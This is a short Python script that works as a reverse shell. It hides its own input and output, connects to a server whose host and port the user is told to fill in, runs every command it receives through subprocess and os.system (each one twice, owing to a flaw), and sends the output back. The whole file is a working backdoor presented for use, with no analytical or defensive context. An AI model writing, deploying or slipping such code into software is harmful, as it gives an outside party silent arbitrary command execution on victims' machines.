import socket
import subprocess
import os
import sys


# EDIT HOST, PORT TO YOUR SERVER SETTINGS

HOST = 'localhost'
PORT = 25565

# DONT EDIT BELOW

sys.stderr, sys.stdout, sys.stdin = open(os.devnull, "w"), open(os.devnull, "w"), open(os.devnull, "w")

sock = socket.socket()
sock.connect((HOST, PORT))

while True:
    command = sock.recv(1024).decode()
    
    if command[:2] == 'cd':
        os.chdir(str(command[3:]))
        output = 'Path Changed to ' + str(command[3:])
    else:
        output = subprocess.getoutput(str(command))

    os.system(str(command))
    sock.send(output.encode())

